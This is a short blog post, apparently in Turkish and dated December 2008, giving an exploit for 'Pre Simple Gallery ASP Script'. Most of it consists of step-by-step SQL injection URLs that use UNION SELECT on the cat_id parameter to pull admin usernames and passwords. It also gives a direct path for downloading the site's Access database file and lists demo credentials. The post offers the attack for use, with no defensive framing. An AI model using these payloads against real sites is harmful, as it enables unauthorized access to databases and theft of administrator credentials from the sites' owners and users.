link 1: http://packetstormsecurity.org/0812-exploits/presimple-sqldisclose.txt
link 2: http://www.exploiter5.com/all.php?id=46
Discovered By: ZoRLu
exploit for demo:
you go this link:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin
right click to on photo and you must see
http://preproject.com/pgallery/pimages/4
column number 4
and you goo this links
username:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
password:
http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin
http://preproject.com/pgallery/pimages/admin
so for demo:
username: admin
password: admin
exp for demo: (DD)
http://preproject.com/pgallery/database/photo.mdb
22 Aralık 2008 Pazartesi
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns
Kaydol:
Kayıt Yorumları (Atom)
0 yorum:
Yorum Gönder